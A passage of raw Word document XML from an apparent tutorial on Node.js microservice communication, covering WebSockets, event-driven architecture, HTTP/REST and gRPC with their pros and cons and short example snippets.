        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C7C38" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Adds additional infrastructure and complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD62851" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="304"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Introduces some delay due to message queuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752A85B" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. WebSockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49118F2A"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a full-duplex communication channel over a single, long-lived connection, making them suitable for real-time communication between microservices or with clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE0B82" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC5E7B" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Real-Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports real-time, bidirectional communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C16FE0" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Low Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Reduces the overhead of establishing multiple HTTP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED9A05" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593AB41E" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Managing WebSocket connections can be complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1CB7F1" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resource Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Requires maintaining open connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9789C"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using ws package:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A49862"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WebSocket = require('ws');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76C1F7"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8FBFCD1"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ws = new WebSocket('ws://localhost:8080');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EC0D6"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4D87C3A"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ws.on('open', function open() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60229688"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ws.send('Hello Server!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F5DAF7"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7DDFD5C"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A4DA522"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ws.on('message', function incoming(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC50D14"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console.log(`Received: ${data}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15937855"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57C13F8" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416E8B0"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In an event-driven architecture, microservices communicate by emitting and listening to events. Services can use an event bus or event stream to publish and subscribe to events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE96860" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E560CCF" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="306"/>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 Allows for scalable and loosely-coupled architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16362430" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Services can react to events asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361707C0" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C912113" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Event processing can become complex to manage and debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEA4F3" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Requires handling of event schema evolution and error scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FAF052" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A20" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using eventemitter3 for an in-process event bus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE15AF"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EventEmitter = require('eventemitter3');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC28D60"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emitter = new EventEmitter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB67B90"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2AEF510"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emitter.on('event', (data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC5808"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console.log(`Received event with data: ${data}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9F011"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90B88C0"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A8A2004" w14:textId="77777777" w:rsidR="00EA0A20" w:rsidRPr="00DA2F32" w:rsidRDefault="00EA0A2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emitter.emit('event', 'Hello World');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008A97F" w14:textId="77777777" w:rsidR="0018537F" w:rsidRPr="00DA2F32" w:rsidRDefault="0018537F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9C4A02" w14:textId="075B2D0E" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc178383294"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain various communication protocols and patterns</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="72B93C0D" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In a microservices architecture, communication between services can be achieved through various protocols and patterns. Choosing the right protocol and pattern depends on factors like the nature of the communication (synchronous or asynchronous), performance requirements, and scalability needs. Here’s an overview of the most common communication protocols and patterns used in Node.js microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741C43F" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Communication Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411272BD" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTP/REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC88BEE"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HTTP/REST is a widely used protocol for building web services. Microservices expose endpoints over HTTP, and other services interact with these endpoints using standard HTTP methods (GET, POST, PUT, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD3068"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Simple service-to-service communication, APIs for client applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A26E4DE"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3126DF62"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Easy to understand and implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B547810"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Well-supported with many tools and libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328EBFE7"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2964BC56"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Can introduce latency due to HTTP overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A0AA8"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Stateless nature may require more data to be sent with each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68979995" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in Node.js using axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600ED697"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axios = require('axios');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B467B"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6DBBE8A"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axios.get('http://service1/api/resource')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77299683"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.then(response =&gt; console.log(response.data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11800C64"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.catch(error =&gt; console.error(error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786801E9" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E4094"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gRPC is a high-performance RPC framework that uses HTTP/2 for transport and Protocol Buffers (protobuf) for serialization. It supports synchronous and asynchronous communication, streaming, and multi-language support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A04E33"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High-performance communication, low-latency requirements, microservices with complex interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E4CB9A"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6C639AF3"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Efficient serialization and deserialization with Protocol Buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C4B79"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Built-in support for bidirectional streaming and multiplexing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582829B6"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17D51345"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More complex setup compared to HTTP/REST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645103F9"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Requires learning Protocol Buffers and gRPC concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312535B" w14:textId="77777777" w:rsidR="00577368" w:rsidRPr="00DA2F32" w:rsidRDefault="00577368" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in Node.js using grpc package:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750762F3"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grpc = require('grpc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BF1AC"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protoLoader = require('@grpc/proto-loader');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432334D1"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8AE0DE4"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const PROTO_PATH = './service.proto';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857C71D"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packageDefinition = protoLoader.loadSync(PROTO_PATH);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E4A80"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proto = grpc.loadPackageDefinition(packageDefinition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FCD55C"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392017E"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client = new proto.ServiceName('localhost:50051', grpc.credentials.createInsecure());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134FF4CD"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D6F0E85"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client.SomeMethod({ key: 'value' }, (error, response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D1168"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(!error) {</w:t>
      </w:r>
    </w:p>
